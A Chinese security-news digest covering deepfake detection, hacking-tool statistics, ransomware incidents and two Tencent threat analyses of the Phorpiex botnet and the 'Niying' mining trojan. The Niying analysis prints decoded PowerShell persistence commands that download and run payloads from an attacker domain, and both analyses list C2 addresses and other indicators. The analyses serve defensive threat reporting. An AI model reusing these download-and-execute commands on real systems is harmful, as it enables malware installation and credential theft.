分类: 安全快讯

Facebook 竞赛结果显示:准确检测深度造假视频的能力尚无人具备

Facebook公布了第一届Deepfake Detection Challenge(深度伪造检测挑战赛)的结果,这是一场算法的公开竞赛,目的是能够发现人工智能操纵的视频。结果虽然很有希望,但显示在自动化系统能够可靠地发现深层造假内容之前,还有很多工作要做,研究人员将这个问题描述为 “未解决的问题”。 Facebook表示,在比赛中获胜的算法能够发现挑战现实世界的深度伪造视频,平均准确率为65.18%,尽管还不错,但这不是你想要的任何自动化系统的准确率。 事实证明,深度伪造视频对于社交媒体来说是一种夸张的威胁。虽然这项技术引发了人们对视频证据的怀疑,但到目前为止,深度伪造视频的政治影响微乎其微。相反,更直接的伤害是非自愿的色情内容产生,这一类内容对社交媒体平台来说更容易识别和删除。 Facebook的首席技术官Mike Schroepfer在新闻发布会上告诉记者,他对挑战赛的结果很满意,他表示,这将为研究人员建立一个基准,并指导他们未来的工作。约有2 114名参赛者向比赛提交了35000多个检测算法,测试他们从约10万个短片的数据集中识别深层假视频的能力。Facebook雇佣了3000多名演员来制作这些片段,他们在自然环境中进行对话的记录,有些片段是用人工智能改变的,让其他演员的脸贴到他们的视频上。 研究人员被允许访问这些数据来训练他们的算法,当对这些材料进行测试时,他们产生的准确率高达82.56%。然而,当同样的算法对由未见过的镜头组成的 “黑盒 “数据集进行测试时,它们的表现要差得多,得分最好的模型准确率为65.18%。这表明在野外检测深度造假视频是一个非常具有挑战性的问题。 Facebook目前正在开发自己的深度造假视频检测技术。该公司在今年早些时候宣布禁止Facebook用户发布深度造假视频,但批评者指出,虚假信息更大威胁来自所谓的 “浅层假货”,使用传统手段编辑的视频。本次挑战赛的获胜算法将作为开源代码发布,以帮助其他研究人员,但Facebook表示,将对自己的检测技术保密,以防止其被反向工程。     (稿源:cnBeta,封面源自网络。)

Python 和 Go 成为年度最受欢迎的黑客工具榜首

网络安全公司 Imperva Cloud WAF 近期分享了其在 2019 年一年内针对网络安全事件的观察。对数据进行聚类分析后,他们得到了如下结论: 按工具来分类,Python 依旧是大多数黑客的首选武器,紧接着是使用量增长迅速的 Go 语言;再其次是 WinHttp 库,该库主要由 Windows 上运行的 .net 和 CPP 使用;Shell 工具(如 cURL、wget 等)也榜上有名。浏览器也是常用的攻击工具。 根据 GitHut 2.0 给出的统计信息,Python 和 Go 都在 2019 年的前五大语言中占有一席之地。于是,Imperva 公司又将目光聚焦到了 GitHub 上的网络安全项目。GitHub 虽然未对存储库进行直接分类,但 Security 主题下拥有超过 8,500 个与安全相关的库,而这些库中的主要语言分别为:长期排在第一位的 Python,其次是 Java、JavaScript 和 PHP,最后是 Go。前四位毫不令人意外,而 Go 是在 2019 年首次取代了基于 Shell 的代码,进入 top 榜。 Imperva 公司创建了一个图表,用以显示 2019 年受每种工具攻击的网站所占的百分比。数据显示,大多数网站每个月都会受到 Python 的攻击,而 30-50% 的网站会受到其他上述工具的攻击。 接下来,该公司又对两种最常见的攻击——XSS 和 SQLi——以及通过 Go 和 Python 使用这些攻击的尝试进行了观察。值得注意的是,到 2019 年底,Go 在两种类型的攻击中都赶上了 Python。不过,判断这种趋势是否会持续还为时过早,但 Go 变得越来越流行是毋庸置疑的。 另外,每种主要攻击类型的工具分布如下图: 如图所示,Python 是 RCE/RFI、文件上传和数据泄漏中占比最大的工具,而 Go 在常规自动攻击中更强大。 根据 IP 查看工具使用的来源国家/地区如下图: 中国使用 Python 的比其他任何国家都多,而 Go 是印度的首选工具。 意料之外的是,使用工具进行攻击的 IP 数量与该工具引起的安全事件数量之间没有强烈的关联。这部分可以通过工具所涉及的攻击类型来解释。 通过查看事件与 IP 之间的比率,也可以进一步验证该假设。例如,可以轻松用于浏览器模拟的低请求率工具,其 IP 比率非常低。相比之下,Go 和 Python 等可产生大规模攻击的工具的 IP 比率则高得多。 该公司在近期关于网络安全的研究中,还带来了以下发现: DDoS 攻击的数量和规模不断增加 来自云服务的攻击增长 机器人流量也在上涨 另外,随着疫情的缓解,网络攻击带来的流量又开始恢复和增长 详情可查看报告原文:https://www.imperva.com/blog/python-and-go-top-the-chart-of-2019s-most-popular-hacking-tools/     (稿源:开源中国,封面源自网络。)

遭遇勒索软件攻击 本田暂停工厂生产并关闭办公室

据外媒报道,本田的全球业务受到了勒索软件攻击,这家日本汽车制造商仍在努力让一切恢复正常。该家公司于当地时间周二表示,它将不得不暂时关闭部分生产设施,另外客户和金融服务业务也已经被关闭。本田在向The Verge发表的一份声明中说道:“目前没有证据表明个人身份信息丢失。我们大多数工厂都已恢复生产,目前正在努力恢复我们在俄亥俄州的汽车和发动机工厂的生产工作。” 据了解,本田遭到的网络攻击所使用的是被认为是被叫做Snake的勒索软件。通过它,黑客可以对遭到攻击的公司的文件进行加密将其作为勒索筹码。根据The Verge网站看到的一条信息显示,本田在其内部警报系统中将其称为“重大电脑勒索软件病毒攻击”。“来自全球和跨NA地区的IT团队正在持续工作以遏制这次攻击(带来的影响),另外还在尽快恢复正常的业务操作,但许多依赖于信息系统的业务流程仍受到了影响。” 据Twitter上的投诉显示,虽然本田表示一些工厂正在重新开工,但业主无法进行在线支付或进入公司的客户服务网站。该公司北美最大的客户和金融服务办公室的一名员工告诉The Verge,临时员工在办公室关闭时是没有工资的。 即使系统已经备份,本田美国客户和金融服务办公室的许多员工也无法远程工作。正如The Verge在5月份报道的那样,这意味着在大流行期间,许多员工不得不去办公室,对此一些员工担心公司在阻止新冠病毒传播方面做得不够。不过在过去几周,这些办公室的员工告诉The Verge,本田终于开始实行体温检测、加强社交距离,并且在某些地区地方允许更多的人远程工作。     (稿源:cnBeta,封面源自网络。)

Phorpiex 僵尸网络病毒新增感染可执行文件

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/sRE5CyyEutzs_Z9BDdyGnA 一、概述 腾讯安全团队检测到Phorpiex僵尸网络病毒在国内近期较为活跃,该病毒的新版本增加了对感染32位PE文件(一种可执行文件)的能力,被感染的可执行文件被添加.zero恶意后门节代码,同时该病毒移除了检测虚拟机环境的相关代码。当已被感染的32位PE文件(通常是EXE可执行程序文件)在正常无毒的电脑中运行时,将会下载执行Phorpiex病毒主模块,实现病毒在不同电脑之间的感染传播。腾讯安全还检测到Avaddon勒索病毒使用Phorpiex僵尸网络的基础设施分发投递。 PE感染特性将导致Phorpiex僵尸网络病毒增加更多传播途径,如:已被感染的PE可执行文件可能通过移动设备的交换传播;带毒程序如果感染网站服务器,访客电脑可能通过网站下载被感染。 我们知道,感染型病毒曾经在WinXp之前的时代比较多见,现在已很少见,网民对这类病毒变得比较陌生,会有利于Phorpiex僵尸网络病毒通过网络或移动存储介质交换感染扩散。 Phorpiex僵尸网络传播途径较多,总结一下,主要有以下几种: 通过被感染的U盘、移动硬盘传播; 通过网站Web服务目录下被替换的文件下载传播; 通过被感染的压缩包文件传播; 通过VNC爆破传播; 通过感染32位PE可执行程序文件传播(新增) Phorpiex僵尸网络病毒主要通过投递、分发其它恶意病毒木马来获利。包括:挖矿木马、盗窃虚拟币的木马、群发诈骗邮件敲诈虚拟币、为其他勒索病毒提供分发渠道等等。腾讯T-Sec终端管理系统(御点)及腾讯电脑管家均可查杀Phorpiex僵尸网络病毒。 二、样本分析 被感染文件: 观察被感染后的文件可知新增了.zero节数据,运行被感染的可执行文件将会首先执行新增的恶意代码部分,再跳转到OEP处执行程序的原始功能,从而实现新的感染。 新增节内感染代码首先判断%appdata%\winsvcs.txt文件是否存在,文件属性是否隐藏。winsvcs.txt名的隐藏文件为Phorpiex病毒攻击成功后的标记文件,病毒通过检测该文件的属性来避免对已中毒主机的反复感染。 当感染代码判断该主机未被感染过,则从C2地址:88.218.16.27处拉取pe.exe模块到tmp目录执行,该文件后分析为Phorpiex病毒主文件。 拉取执行PE.exe病毒主文件完毕后,感染代码最终通过 PEB->ldr->InLoadOrderModuleList获取到当前模块基址后计算出原始未感染前入口代码地址跳转执行,以确保感染病毒后的可执行程序能正常运行。 Phorpiex僵尸网络主病毒文件: 88.218.16.27处拉取的pe.exe模块同样为加壳程序文件,内存Dump后可知,该模块为Phorpiex僵尸网络主传播模块。 该版本的Phorpiex主模块相比较老版本,在入口处的环境检测中相关代码中,将反虚拟机功能取消,只保留了反调试功能,这也意味着虚拟机环境下Phorpiex病毒也会从C2服务器下载恶意代码运行。 该版本的Phorpiex除作为downloader推广其它恶意程序外,自身主要创建4个功能线程: 线程1(老功能) 线程2(老功能) 线程3:(老功能) 线程4(新增) 感染文件过程过程是在%systemdrive%系统盘内展开的 感染目标为后缀.exe的PE类型文件,同时如果系统目录内文件绝对路径包含以下关键字符,不对其进行感染。以免感染到系统文件导致程序运行出错,从而避免被用户过早发现。 病毒感染时会排除含以下关键词的目录:windows,sys,$recycle.,service,intel,micro,boot,driver,recovery,update,drv。 文件名感染排除关键词:.exe.,win,sys,drv,driver,$,drivemgr.exe等。 感染过程采取文件映射方式,根据其感染代码可知,病毒对PE-64进行了排除,只感染32位文件。虽然如此,但由于当前Windows平台下多数软件为了兼容性未提供x64版本,故病毒依旧能够感染到大量的文件。病毒感染完成后会将内置的zero_code代码作为附加节数据添加到被感染文件中,zero_code中硬编码了一个0xCCCCCCCC常量,该常量在zero_code节代码拷贝完成后进行动态查找然后修改为原始程序OEP。 Avaddon勒索病毒与Phorpiex僵尸网络的关联 腾讯安全还捕获到通过邮件附件传播的伪装成图片的恶意样本。 附件包内图片扩展名的隐藏文件,实际为js脚本文件,只需要在文件夹选项中打开查看已知文件的扩展名。 脚本文件将会使用Poweshell或者Bitadmin尝试从217.8.117.63地址下载名为jpr.exe的文件执行,该投递方式疑为Phorpiex僵尸网络的手法。 通过腾讯安图大数据威胁情报管理可知,IP:217.8.117.63,确实为Phorpiex僵尸网络基础设施。 下载的jpr.exe经鉴定为新型Avaddon勒索病毒。 IOCs MD5: e28c6a5e9f89694a0237fe4966a6c32c 04deb3031bd87b24d32584f73775a0a8 4c7b7ce130e2daee190fc88de954292d c9ec0d9ff44f445ce5614cc87398b38d IP: 88.218.16.27 217.8.117.63 Domain: tldrbox.top tldrbox.ws URL: hxxp://88.218.16.27/1 hxxp://88.218.16.27/2 hxxp://88.218.16.27/3 hxxp://88.218.16.27/4 hxxp://88.218.16.27/5 hxxp://88.218.16.27/v hxxp://tldrbox.top/1 hxxp://tldrbox.top/2 hxxp://tldrbox.top/3 hxxp://tldrbox.top/4 hxxp://tldrbox.top/5 hxxp://tldrbox.top/v hxxp://tldrbox.ws/1 hxxp://tldrbox.ws/2 hxxp://tldrbox.ws/3 hxxp://tldrbox.ws/4 hxxp://tldrbox.ws/5 hxxp://tldrbox.ws/v hxxp://217.8.117.63/jpr.exe 参考链接 https://mp.weixin.qq.com/s/zbqLmCBblvbZQwsM2XJd2Q https://mp.weixin.qq.com/s/3kyLkoBd9K-5_VSk5Nnb6A            

“匿影”挖矿木马持续活跃,入侵某旅游网站做病毒下载服务器

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/WoYcqgC-xXtM2s752215yQ 一、背景 腾讯安全威胁情报中心检测到“匿影”挖矿木马变种攻击。该变种木马依然利用永恒之蓝漏洞进行攻击传播,通过计划任务、WMI后门进行本地持久化,然后在攻陷机器下载XMRig矿机挖矿门罗币、下载nbminer矿机挖矿HNS(Handshake),还会利用regsvr32.exe加载执行DLL形式的木马程序,匿影木马新变种在已安装腾讯电脑管家等数款安全软件的电脑上不运行,试图避免被安全厂商检测到。 “匿影”挖矿木马擅长利用利用各类公共网址进行数据统计和木马下载,此次变种攻陷了某旅游文化网站并将其作为木马下载服务器,其使用过的公共网址如下: upload.ee 免费网盘 anonfiles.com 免费图床 sowcar.com 免费图床 popo8.com 免费图床 img.vim-cn.com 免费图床 urlxxx.at.ua 建站服务 mywebnew.ucoz.pl 建站服务 addressnet.do.am 建站服务 googlenew.moy.su 建站服务 ludengapp.com 某设计公司网站 worldyou.top 某文旅公司网站(新) 二、样本分析 “匿影”挖矿木马释放永恒之蓝漏洞利用攻击程序包到C:\Users\Public目录下并启动主程序storageg.exe开始扫描攻击。   在攻陷的目标机器执行Payload(x86.dll或x64.dll), Payload会检测腾讯电脑管家、金山毒霸等杀软是否存在,若不存在继续执行一段Base64编码的Powershell命令。 Base64编码的Powershell命令解码后内容如下: schtasks /create /ru system /sc MINUTE /mo 80 /tn VNware /tr "powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBtAHkAdwBlAGIAcwBhAGEAdAAuAHgAeQB6AC8AdgBpAHAALgB0AHgAdAAnACkAKQA=" 该命令安装名为“VNware ”的计划任务,每隔80分钟执行一次另一段经过base64编码的Powershell命令,同样,解码后内容如下: IEX ((new-object net.webclient).downloadstring('http[:]//mywebsaat.xyz/vip.txt')) 然后计划任务从http[:]//mywebsaat.xyz/vip.txt下载vip.txt反复运行,并完成以下功能: 1、访问统计页面,记录攻击次数 2、安装计划任务“PCHunterDNS”和”\Microsoft\Windows\UPnP\Services”进而持久化执行恶意代码: IEX ((new-object net.webclient).downloadstring('https[:]//mywebsaat.xyz/123.jpg')) 3、通过注册表修改操作,关闭Windows Defender,同时开启WDigest缓存(可以从内存缓存中窃密用户名和登陆密码)。 在执行该步骤前,脚本会从百度官网下载LOGO图标https[:]//www.baidu.com/img/bd_logo1.png,并保存为C:\ProgramData\Defender.txt,通过判断该文件是否存在,来确认这个步骤是否执行过。 4、安装WMI后门(事件过滤器“fuckamm3”、事件消费者“fuckamm4”)持久化运行恶意代码IEX ((new-object net.webclient).downloadstring(‘http[:]//mywebsaat.xyz/kp.txt’)),而“fuckamm3”、“fuckamm4”是Mykings挖矿僵尸网络团伙使用的WMI后门名称,推测“匿影”挖矿木马团伙与Mykings挖矿僵尸网络可能有一定的关联。 5、下载和启动挖矿程序,脚本会从多个地址下载不同的挖矿程序,存放在不同的路径下,具体样本如下: C:\Users\Public\MicrosftEdgeCP.exe是显卡挖矿软件NBMiner (https://github.com/NebuTech/NBMiner/releases),支持NVIDIA、AMD显卡,支持GRIN、AE、CKB、SERO、SIPC、BTM、ETH、SWAP等币种的挖矿。 其中某旅游文化公司网站也被黑客攻陷作为挖矿木马下载服务器: WMI后门中的Powershell脚本kp.txt还会下载DLL木马https[:]//rss.mywebsaat.xyz/cccdll.jpg并利用regsvr32.exe加载执行,然后通过该DLL启动挖矿木马。 new-object System.Net.WebClient).DownloadFile( 'https[:]//rss.mywebsaat.xyz/cccdll.jpg','C:\Users\Public\eos.dll') `Start-Process -FilePath C:\Windows\SysWOW64\regsvr32.exe '/s C:\Users\Public\eos.dll'` 完成挖矿木马启动和持久化过程后,继续下载永恒之蓝攻击模块http[:]//rss.mywebsaat.xyz/yh.jpg,启动下一轮攻击: IOCs Domain mywebsaat.xyz rss.mywebsaat.xyz URL https[:]//www.upload.ee/files/11799957/1.txt.html https[:]//www.upload.ee/files/11814903/1.txt.html https[:]//www.upload.ee/files/11815494/1.txt.html https[:]//www.upload.ee/files/11816420/1.txt.html https[:]//www.upload.ee/files/11816445/1.txt.html https[:]//www.upload.ee/files/11822214/1.txt.html http[:]//mywebsaat.xyz/999.jpg https[:]//mywebsaat.xyz/xmr.jpg http[:]//mywebsaat.xyz/nb.jpg http[:]//mywebsaat.xyz/yh.jpg http[:]//mywebsaat.xyzc.jpg http[:]//mywebsaat.xyz/fxtxt.jpg http[:]//mywebsaat.xyzakhost.jpg http[:]//rss.mywebsaat.xyz/xmr.jpg http[:]//rss.mywebsaat.xyzakhost.jpg http[:]//rss.mywebsaat.xyz/nb.jpg http[:]//rss.mywebsaat.xyz/yh.jpg http[:]//rss.mywebsaat.xyzc.jpg http[:]//rss.mywebsaat.xyz/fxtxt.jpg https[:]//mywebsaat.xyz/cccdll.jpg http[:]//mywebsaat.xyz/kp.txt https[:]//mywebsaat.xyz/123.jpg http[:]//www.worldyou.top/images/xmr.jpg http[:]//www.worldyou.top/images/tsakhost.jpg http[:]//www.worldyou.top/images/999.jpg http[:]//www.worldyou.top/images/btc.jpg http[:]//www.worldyou.top/images/fxtxt.jpg http[:]//www.worldyou.top/images/nb.jpg http[:]//www.worldyou.top/images/sd.jpg http[:]//www.worldyou.top/images/yh.jpg MD5 33110e53078ed5a0cf440d182878f30b 441a61cdd30502b3fcca03c28ccb49e8 5e20062b94f38e447be60f9f2b0286cd ee5d5f0e0fe7db7186f72d3d5256b1be f4fbfb10c441974ef5b892a35b08e6eb 85f25f9264664111f7df6dc76320b90b

Brave 浏览器因私自插入返利代码而遭到猛烈抨击

基于 Chromium 开发的 Brave 浏览器,近日曝出了自动插入返利代码的问题。当用户搜索加密货币企业时,将被添加重定向代码以获得佣金。Decrypt.co 报道称,币安、Coinbase 和 Trezor 都在其列。事发后,Brave 首席执行官已经作出道歉,承诺今后不会再这么做,且用户能够在 brave://settings 设置页面禁用相关代码。 Twitter 网友 Yannick Eckl 率先曝光了此事,作为一款宣称对加密友好的隐私优先浏览器,Brave 此举确实对自己的声誉造成了极大的损害。 与该公司此前遵循的“选择加入”原则不同,Brave 从未向其 1500 万越活用户解释过此事。即便浏览器上的广告是可选的,且会向任何观看过的用户支付加密货币。 随着 JRR Crypto 高管 Dimitar Dinev 挖掘出了 Brave 重定向代码的更多细节,此事终于引发了一场强烈的舆论风暴。 GitHub 上托管的代码显示,该浏览器还会将用户重定向至 Ledger、Trezor 和 Coinbase 等网站。 最终,Brave 首席执行官兼联合创始人 Brendan Eich 也在 Twitter 上向公众致歉,声称该问题目前“已被修复”,且保证不会再发生类似的行为。 不过截止发稿时,Brendan Eich 尚未回应 Decrypt.co 的进一步置评请求。     (稿源:cnBeta,封面源自网络。)

DDoS 租用服务 vDOS 两位创始人被判处 6 个月社区服务

DDoS 租用服务 vDOS 目前已经停止运行,在过去四年中帮助付费客户发起了超过 200 万次分布式拒绝服务(DDoS)攻击,让无数互联网用户和网站陷入离线状态。近日该服务的联合创始人 Yarden Bidani 和 Itay Huri 被以色列法院判处六个月的社区服务。 在 FBI 对 vDOS 服务深入调查之后,锁定了犯罪嫌疑人 Yarden Bidani 和 Itay Huri,两人均为以色列公民,在 2016 年被捕的时候年仅 18 岁。 在 2016 年服务关闭之前,vDOS 是业内最可靠、最强大的 DDoS 租用或者“booter”服务,即使是完全不熟练的互联网用户也能付费发起击垮大多数网站的瘫痪攻击。 在广告宣传中,vDOS 宣称能够以每秒50千兆比特的数据(Gbps)发起攻击。对于那些没有使用昂贵的反DDoS保护服务网站,这足以使其瘫痪。 在这份以希伯来语撰写的量刑备忘录(PDF)中,尽管已经对两名被告使用了化名,但依然能从文件的诸多线索中确定被告的身份。例如,两名被告在运营 vDOS 服务期间非法所得超过60万美元。     (稿源:cnBeta,封面源自网络。)

Zoom 并未给免费用户提供端到端加密 “以防有人将其用于不良目的”

由于COVID-19迫使更多的人在家办公,Zoom的使用量迅猛攀升,导致人们对这款视频会议工具的安全性和隐私性产生了极大的兴趣。端到端加密的缺失是很多用户最关心的问题,但在最近收购Keybase之后,Zoom CEO袁征(Eric S.Yuan)表示,将 “帮助我们建立能够达到当前Zoom扩展性的端到端加密”。 不过据外媒报道,Zoom只是给其付费用户提供端到端加密。任何使用免费账户的人都将无法获得该功能。为什么这么说呢?袁征解释说,”我们也希望与FBI、与当地执法部门合作,以防有人将Zoom用于不良目的”。 这个说法是在一次财报电话会议上提出的。在谈及付费用户端到端加密的到来时,袁征表示:“我们肯定不想给免费用户提供该服务,因为我们也想和FBI、和地方执法部门一起合作,以防有人将Zoom用于不良目的。” 隐私组织Privacy Matter发推文回应了这一消息。 来自Fight for the Future的隐私倡导者Evan Greer表示: 基本的安全性不应该是一个高级功能,这只是提供给富有的个人和大公司。该公司表示,只有在你支付额外费用的情况下,他们才会保证你的通话安全,这实在是太恶心了。 Zoom一位发言人告诉《卫报》:“我们不会与执法部门分享信息,除非是在儿童性虐待的情况下。我们没有后门,任何人都可以在不被他人看到的情况下进入会议。这些都不会改变。”他还指出,该公司不会“主动监控会议内容”。     (稿源:cnBeta,封面源自网络。)

Chrome 用户现可利用安全检查工具扫描出不必要应用

据外媒报道,谷歌正在添加Chrome Cleanup工具,该工具在Chrome设置中已经可用,用户可以通过“安全检查(Safety check)”来扫描并删除电脑上的不需要的应用软件。首先,谷歌引入了为Chrome浏览器打造的Software Removal工具(之后将其重命名为Chrome Cleanup),其以独立的程序身份供用户下载并对在Chrome浏览器中的不必要应用(Potentially Unwanted Programs)进行扫描和修复。 Chrome Cleanup目前已被集成到Chrome设置和Sandbox引擎及ESET检测引擎中以此来检测更多对Chrome浏览器造成损害的不良行为。 目前,Cleanup工具可通过设置>高级>重置和清理>清理计算机(Chrome:// Cleanup /Settings)进行访问。 如果点击Find(查询),该工具就会开始扫描对电脑造成危害的程序尤其是对Chrome设置造成危害的程序。 最近,谷歌在Chrome浏览器重新设计的隐私和安全设置中加入了安全检查工具。该工具能扫描密码、扩展名、安全浏览技术和Chrome更新状态。 现在谷歌则正在将Chrome Cleanup工具加入到Safety检查中以此来扫描电脑中的PUP。     (稿源:cnBeta,封面源自网络。)  

黑莓安全研究部门发现针对 Windows PC 的新“大亨”赎金软件

据外媒报道, 美国联邦调查局(FBI)的互联网犯罪投诉中心(IC3)去年发布了《网络犯罪报告》。报告显示,网络犯罪在2019年造成了35亿美元的巨大损失。攻击者利用赎金软件从企业和个人用户身上套取金钱。黑莓的安全研究部门最近发现了一种新的赎金软件,影响了欧洲一家教育机构。与迄今为止发现的大多数赎金软件不同的是,这种新的赎金软件模块被编译成一种Java图像文件格式(JIMAGE)。 JIMAGE是一种存储自定义的JRE映像的文件格式,它的设计是为了在运行时被Java虚拟机(JVM)使用。 以下是攻击的过程: 为了在受害者的机器上实现持久化,攻击者使用了一种名为映像劫持(Image File Execution Options,IFEO)注入的技术。IFEO设置被存储在Windows注册表中。这些设置给了开发者一个选项,在目标应用程序执行过程中,通过附加调试应用程序来调试他们的软件。 随后一个后门与操作系统的微软Windows屏幕键盘(OSK)功能一起执行。 攻击者利用ProcessHacker工具禁用了组织的反恶意软件解决方案,并更改了活动目录服务器的密码。这使得受害者无法访问他们的系统。 攻击者的大部分文件都被进行了时间限制,包括Java库和执行脚本,文件日期时间戳为2020年4月11日15:16:22 最后,攻击者执行了Java赎金软件模块,对所有文件服务器进行了加密,包括连接到网络的备份系统在内的所有文件服务器都进行了加密。 在提取出与该赎金软件相关的zip文件后,以 “大亨 “为名,共有三个模块。所以,黑莓团队将这个赎金软件命名为 “大亨”。 下面来看看 “大亨 “的赎金说明:     (稿源:cnBeta,封面源自网络。)